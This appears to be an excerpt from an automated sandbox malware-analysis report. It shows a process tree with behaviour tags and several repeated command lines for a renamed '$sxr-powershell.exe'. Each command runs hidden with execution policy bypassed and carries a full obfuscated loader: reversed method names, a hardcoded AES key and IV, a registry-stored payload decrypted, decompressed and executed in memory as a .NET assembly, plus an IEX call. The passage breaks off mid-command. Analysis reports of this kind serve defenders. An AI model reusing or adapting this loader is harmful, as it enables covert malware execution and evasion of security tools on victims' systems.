$xZBvX.Dispose(); $xZBvX.ToArray();}function yOuXN($PJoKM,$TPKFP){ $HzAuX=[System.Reflection.Assembly]::Load([byte[]]$PJoKM); $njNEM=$HzAuX.EntryPoint; $njNEM.Invoke($null, $TPKFP);}$zAHbk1 = New-Object System.Security.Cryptography.AesManaged;$zAHbk1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zAHbk1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zAHbk1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8=');$zAHbk1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ==');$XATWs = $zAHbk1.('rotpyrceDetaerC'[-1..-15] -join '')();$InvRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K1CkLsbgHsaqjP07dOw2WA==');$InvRe = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe, 0, $InvRe.Length);$InvRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe);$lHCNf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mgaXTEcchBwKiFfurNf/ZvU7pDIOIRUS5fl2vv2xXeE=');$lHCNf = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($lHCNf, 0, $lHCNf.Length);$lHCNf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($lHCNf);$mvSac = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SMFDBATqcCLCffiPgcVkeA==');$mvSac = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mvSac, 0, $mvSac.Length);$mvSac = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mvSac);$fYhvB = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('m0/I7rIGbiBVxCE4WTkxKXrIhId+xRJu1rELFg0sRatzAZFJErBaN0cXbJ97o8zEIQUuHdn0E9FLwW/h/U1hc6jwkcijx4lE6VkAH1OJkts5kyb2YIRluw8m1KC/amNr0TCUnPudPp3KBcVKGDC8TzQuwcLP3xvVlp9FkaoWtmG/i2TedFhwHEgMOB09p7WNJA0Q1cbZD90fmmUxB03UL7S26YlUwLgKbUG2E+hkLUo2XBW1SjqK7s+7KIv+FxsKe1Q6epFglHVxCjSwGwIQAUvg2C1GxLbKYm14kxWUxy85/0FO+48f/xHK6Ka1ZeQ20mgOghTmQ9IpFjCI/zOREYShr3iKDdcQdquznhnOBRIW9QNSuxuM+GBRAkeVB3KmWlyH/45GbF7FqE/6zVPhshlGma0EpQE1qJQpZ79Dnyw=');$fYhvB = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fYhvB, 0, $fYhvB.Length);$fYhvB = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fYhvB);$hBYHy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('C9m3OdpGwFdHwPwMI02P1Q==');$hBYHy = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hBYHy, 0, $hBYHy.Length);$hBYHy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hBYHy);$mLgUM = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QnlbpdXHpcZ8OIW6I8JHEw==');$mLgUM = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mLgUM, 0, $mLgUM.Length);$mLgUM = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mLgUM);$UJkfe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRq92anf130ThOkt+/oHfQ==');$UJkfe = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UJkfe, 0, $UJkfe.Length);$UJkfe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UJkfe);$diyny = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nOan84KwuQvybSDbMNzbwg==');$diyny = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($diyny, 0, $diyny.Length);$diyny = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($diyny);$igBFA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9I86vNBFZFkDSOaT6Axf1g==');$igBFA = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($igBFA, 0, $igBFA.Length);$igBFA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($igBFA);$InvRe0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YYa8OopsH+ndA18TV9aICA==');$InvRe0 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe0, 0, $InvRe0.Length);$InvRe0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe0);$InvRe1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2FAiKLQ+H7mhnGGHhuoROg==');$InvRe1 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe1, 0, $InvRe1.Length);$InvRe1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe1);$InvRe2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K4DD6mV1zT0l1FL5isTMSg==');$InvRe2 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe2, 0, $InvRe2.Length);$InvRe2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe2);$InvRe3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tNPPHPCKJCXJeBbFBVQkNg==');$InvRe3 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe3, 0, $InvRe3.Length);$InvRe3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe3);$XATWs.Dispose();$zAHbk1.Dispose();$HsmvD = [Microsoft.Win32.Registry]::$diyny.$UJkfe($InvRe).$mLgUM($lHCNf);$aPQNt=[string[]]$HsmvD.Split('\');$Kpzfr=bvLKH(QPIus([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($aPQNt[1])));yOuXN $Kpzfr (,[string[]] ('%*'));$VDekS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($aPQNt[0]);$zAHbk = New-Object System.Security.Cryptography.AesManaged;$zAHbk.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zAHbk.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zAHbk.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8=');$zAHbk.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ==');$bZtha = $zAHbk.('rotpyrceDetaerC'[-1..-15] -join '')();$VDekS = $bZtha.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($VDekS, 0, $VDekS.Length);$bZtha.Dispose();$zAHbk.Dispose();$qbDkP = New-Object System.IO.MemoryStream(, $VDekS);$xZBvX = New-Object System.IO.MemoryStream;$OugwY = New-Object System.IO.Compression.GZipStream($qbDkP, [IO.Compression.CompressionMode]::$InvRe1);$OugwY.$igBFA($xZBvX);$OugwY.Dispose();$qbDkP.Dispose();$xZBvX.Dispose();$VDekS = $xZBvX.ToArray();$wDNpJ = $fYhvB | IEX;$HzAuX = $wDNpJ::$InvRe2($VDekS);$njNEM = $HzAuX.EntryPoint;$njNEM.$InvRe0($null, (, [string[]] ($mvSac)))
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6384

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6384).WaitForExit();[System.Threading.Thread]::Sleep(5000); function QPIus($PJoKM){ $zAHbk=[System.Security.Cryptography.Aes]::Create(); $zAHbk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zAHbk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zAHbk.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8='); $zAHbk.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ=='); $bZtha=$zAHbk.('rotpyrceDetaerC'[-1..-15] -join '')(); $rEqrJ=$bZtha.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PJoKM, 0, $PJoKM.Length); $bZtha.Dispose(); $zAHbk.Dispose(); $rEqrJ;}function bvLKH($PJoKM){ $qbDkP=New-Object System.IO.MemoryStream(,$PJoKM); $xZBvX=New-Object System.IO.MemoryStream; $OugwY=New-Object System.IO.Compression.GZipStream($qbDkP, [IO.Compression.CompressionMode]::Decompress); $OugwY.CopyTo($xZBvX); $OugwY.Dispose(); $qbDkP.Dispose(); $xZBvX.Dispose(); $xZBvX.ToArray();}function yOuXN($PJoKM,$TPKFP){ $HzAuX=[System.Reflection.Assembly]::Load([byte[]]$PJoKM); $njNEM=$HzAuX.EntryPoint; $njNEM.Invoke($null, $TPKFP);}$zAHbk1 = New-Object System.Security.Cryptography.AesManaged;$zAHbk1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zAHbk1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zAHbk1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8=');$zAHbk1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ==');$XATWs = $zAHbk1.('rotpyrceDetaerC'[-1..-15] -join '')();$InvRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K1CkLsbgHsaqjP07dOw2WA==');$InvRe = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe, 0, $InvRe.Length);$InvRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe);$lHCNf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mgaXTEcchBwKiFfurNf/ZvU7pDIOIRUS5fl2vv2xXeE=');$lHCNf = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($lHCNf, 0, $lHCNf.Length);$lHCNf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($lHCNf);$mvSac = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SMFDBATqcCLCffiPgcVkeA==');$mvSac = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mvSac, 0, $mvSac.Length);$mvSac = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mvSac);$fYhvB = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('m0/I7rIGbiBVxCE4WTkxKXrIhId+xRJu1rELFg0sRatzAZFJErBaN0cXbJ97o8zEIQUuHdn0E9FLwW/h/U1hc6jwkcijx4lE6VkAH1OJkts5kyb2YIRluw8m1KC/amNr0TCUnPudPp3KBcVKGDC8TzQuwcLP3xvVlp9FkaoWtmG/i2TedFhwHEgMOB09p7WNJA0Q1cbZD90fmmUxB03UL7S26YlUwLgKbUG2E+hkLUo2XBW1SjqK7s+7KIv+FxsKe1Q6epFglHVxCjSwGwIQAUvg2C1GxLbKYm14kxWUxy85/0FO+48f/xHK6Ka1ZeQ20mgOghTmQ9IpFjCI/zOREYShr3iKDdcQdquznhnOBRIW9QNSuxuM+GBRAkeVB3KmWlyH/45GbF7FqE/6zVPhshlGma0EpQE1qJQpZ79Dnyw=');$fYhvB = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fYhvB, 0, $fYhvB.Length);$fYhvB = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fYhvB);$hBYHy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('C9m3OdpGwFdHwPwMI02P1Q==');$hBYHy = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hBYHy, 0, $hBYHy.Length);$hBYHy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hBYHy);$mLgUM = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QnlbpdXHpcZ8OIW6I8JHEw==');$mLgUM = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mLgUM, 0, $mLgUM.Length);$mLgUM = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mLgUM);$UJkfe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRq92anf130ThOkt+/oHfQ==');$UJkfe = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UJkfe, 0, $UJkfe.Length);$UJkfe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UJkfe);$diyny = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nOan84KwuQvybSDbMNzbwg==');$diyny = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($diyny, 0, $diyny.Length);$diyny = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($diyny);$igBFA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9I86vNBFZFkDSOaT6Axf1g==');$igBFA = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($igBFA, 0, $igBFA.Length);$igBFA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($igBFA);$InvRe0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YYa8OopsH+ndA18TV9aICA==');$InvRe0 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe0, 0, $InvRe0.Length);$InvRe0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe0);$InvRe1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2FAiKLQ+H7mhnGGHhuoROg==');$InvRe1 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe1, 0, $InvRe1.Length);$InvRe1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe1);$InvRe2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K4DD6mV1zT0l1FL5isTMSg==');$InvRe2 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe2, 0, $InvRe2.Length);$InvRe2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe2);$InvRe3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tNPPHPCKJCXJeBbFBVQkNg==');$InvRe3 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe3, 0, $InvRe3.Length);$InvRe3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe3);$XATWs.Dispose();$zAHbk1.Dispose();$HsmvD = [Microsoft.Win32.Registry]::$diyny.$UJkfe($InvRe).$mLgUM($lHCNf);$aPQNt=[string[]]$HsmvD.Split('\');$Kpzfr=bvLKH(QPIus([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($aPQNt[1])));yOuXN $Kpzfr (,[string[]] ('%*'));$VDekS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($aPQNt[0]);$zAHbk = New-Object System.Security.Cryptography.AesManaged;$zAHbk.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zAHbk.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zAHbk.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8=');$zAHbk.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ==');$bZtha = $zAHbk.('rotpyrceDetaerC'[-1..-15] -join '')();$VDekS = $bZtha.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($VDekS, 0, $VDekS.Length);$bZtha.Dispose();$zAHbk.Dispose();$qbDkP = New-Object System.IO.MemoryStream(, $VDekS);$xZBvX = New-Object System.IO.MemoryStream;$OugwY = New-Object System.IO.Compression.GZipStream($qbDkP, [IO.Compression.CompressionMode]::$InvRe1);$OugwY.$igBFA($xZBvX);$OugwY.Dispose();$qbDkP.Dispose();$xZBvX.Dispose();$VDekS = $xZBvX.ToArray();$wDNpJ = $fYhvB | IEX;$HzAuX = $wDNpJ::$InvRe2($VDekS);$njNEM = $HzAuX.EntryPoint;$njNEM.$InvRe0($null, (, [string[]] ($mvSac)))
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5504

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6384).WaitForExit();[System.Threading.Thread]::Sleep(5000); function QPIus($PJoKM){ $zAHbk=[System.Security.Cryptography.Aes]::Create(); $zAHbk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zAHbk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zAHbk.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8='); $zAHbk.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ=='); $bZtha=$zAHbk.('rotpyrceDetaerC'[-1..-15] -join '')(); $rEqrJ=$bZtha.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PJoKM, 0, $PJoKM.Length); $bZtha.Dispose(); $zAHbk.Dispose(); $rEqrJ;}function bvLKH($PJoKM){ $qbDkP=New-Object System.IO.MemoryStream(,$PJoKM); $xZBvX=New-Object System.IO.MemoryStream; $OugwY=New-Object System.IO.Compression.GZipStream($qbDkP, [IO.Compression.CompressionMode]::Decompress); $OugwY.CopyTo($xZBvX); $OugwY.Dispose(); $qbDkP.Dispose(); $xZBvX.Dispose(); $xZBvX.ToArray();}function yOuXN($PJoKM,$TPKFP){ $HzAuX=[System.Reflection.Assembly]::Load([byte[]]$PJoKM); $njNEM=$HzAuX.EntryPoint; $njNEM.Invoke($null, $TPKFP);}$zAHbk1 = New-Object System.Security.Cryptography.AesManaged;$zAHbk1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zAHbk1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zAHbk1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8=');$zAHbk1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ==');$XATWs = $zAHbk1.('rotpyrceDetaerC'[-1..-15] -join '')();$InvRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K1CkLsbgHsaqjP07dOw2WA==');$InvRe = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe, 0, $InvRe.Length);$InvRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe);$lHCNf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mgaXTEcchBwKiFfurNf/ZvU7pDIOIRUS5fl2vv2xXeE=');$lHCNf = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($lHCNf, 0, $lHCNf.Length);$lHCNf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($lHCNf);$mvSac = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SMFDBATqcCLCffiPgcVkeA==');$mvSac = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mvSac, 0, $mvSac.Length);$mvSac = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mvSac);$fYhvB = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('m0/I7rIGbiBVxCE4WTkxKXrIhId+xRJu1rELFg0sRatzAZFJErBaN0cXbJ97o8zEIQUuHdn0E9FLwW/h/U1hc6jwkcijx4lE6VkAH1OJkts5kyb2YIRluw8m1KC/amNr0TCUnPudPp3KBcVKGDC8TzQuwcLP3xvVlp9FkaoWtmG/i2TedFhwHEgMOB09p7WNJA0Q1cbZD90fmmUxB03UL7S26YlUwLgKbUG2E+hkLUo2XBW1SjqK7s+7KIv+FxsKe1Q6epFglHVxCjSwGwIQAUvg2C1GxLbKYm14kxWUxy85/0FO+48f/xHK6Ka1ZeQ20mgOghTmQ9IpFjCI/zOREYShr3iKDdcQdquznhnOBRIW9QNSuxuM+GBRAkeVB3KmWlyH/45GbF7FqE/6zVPhshlGma0EpQE1qJQpZ79Dnyw=');$fYhvB = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fYhvB, 0, $fYhvB.Length);$fYhvB = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fYhvB);$hBYHy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('C9m3OdpGwFdHwPwMI02P1Q==');$hBYHy = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hBYHy, 0, $hBYHy.Length);$hBYHy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hBYHy);$mLgUM = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QnlbpdXHpcZ8OIW6I8JHEw==');$mLgUM = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mLgUM, 0, $mLgUM.Length);$mLgUM = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mLgUM);$UJkfe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRq92anf130ThOkt+/oHfQ==');$UJkfe = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UJkfe, 0, $UJkfe.Length);$UJkfe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UJkfe);$diyny = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nOan84KwuQvybSDbMNzbwg==');$diyny = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($diyny, 0, $diyny.Length);$diyny = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($diyny);$igBFA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9I86vNBFZFkDSOaT6Axf1g==');$igBFA = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($igBFA, 0, $igBFA.Length);$igBFA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($igBFA);$InvRe0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YYa8OopsH+ndA18TV9aICA==');$InvRe0 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe0, 0, $InvRe0.Length);$InvRe0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe0);$InvRe1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2FAiKLQ+H7mhnGGHhuoROg==');$InvRe1 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe1, 0, $InvRe1.Length);$InvRe1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe1);$InvRe2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K4DD6mV1zT0l1FL5isTMSg==');$InvRe2 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe2, 0, $InvRe2.Length);$InvRe2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe2);$InvRe3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tNPPHPCKJCXJeBbFBVQkNg==');$InvRe3 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe3, 0, $InvRe3.Length);$InvRe3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe3);$XATWs.Dispose();$zAHbk1.Dispose();$HsmvD = [Microsoft.Win32.Registry]::$diyny.$UJkfe($InvRe).$mLgUM($lHCNf);$aPQNt=[string[]]$HsmvD.Split('\');$Kpzfr=bvLKH(QPIus([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($aPQNt[1])));yOuXN $Kpzfr (,[string[]] ('%*'));$VDekS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($aPQNt[0]);$zAHbk = New-Object System.Security.Cryptography.AesManaged;$zAHbk.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zAHbk.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zAHbk.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8=');$zAHbk.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ==');$bZtha = $zAHbk.('rotpyrceDetaerC'[-1..-15] -join '')();$VDekS = $bZtha.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($VDekS, 0, $VDekS.Length);$bZtha.Dispose();$zAHbk.Dispose();$qbDkP = New-Object System.IO.MemoryStream(, $VDekS);$xZBvX = New-Object System.IO.MemoryStream;$OugwY = New-Object System.IO.Compression.GZipStream($qbDkP, [IO.Compression.CompressionMode]::$InvRe1);$OugwY.$igBFA($xZBvX);$OugwY.Dispose();$qbDkP.Dispose();$xZBvX.Dispose();$VDekS = $xZBvX.ToArray();$wDNpJ = $fYhvB | IEX;$HzAuX = $wDNpJ::$InvRe2($VDekS);$njNEM = $HzAuX.EntryPoint;$njNEM.$InvRe0($null, (, [string[]] ($mvSac)))
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5220

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6384).WaitForExit();[System.Threading.Thread]::Sleep(5000); function QPIus($PJoKM){ $zAHbk=[System.Security.Cryptography.Aes]::Create(); $zAHbk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zAHbk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zAHbk.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8='); $zAHbk.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ=='); $bZtha=$zAHbk.('rotpyrceDetaerC'[-1..-15] -join '')(); $rEqrJ=$bZtha.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PJoKM, 0, $PJoKM.Length); $bZtha.Dispose(); $zAHbk.Dispose(); $rEqrJ;}function bvLKH($PJoKM){ $qbDkP=New-Object System.IO.MemoryStream(,$PJoKM); $xZBvX=New-Object System.IO.MemoryStream; $OugwY=New-Object System.IO.Compression.GZipStream($qbDkP, [IO.Compression.CompressionMode]::Decompress); $OugwY.CopyTo($xZBvX); $OugwY.Dispose(); $qbDkP.Dispose(); $xZBvX.Dispose(); $xZBvX.ToArray();}function yOuXN($PJoKM,$TPKFP){ $HzAuX=[System.Reflection.Assembly]::Load([byte[]]$PJoKM); $njNEM=$HzAuX.EntryPoint; $njNEM.Invoke($null, $TPKFP);}$zAHbk1 = New-Object System.Security.Cryptography.AesManaged;$zAHbk1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zAHbk1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zAHbk1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 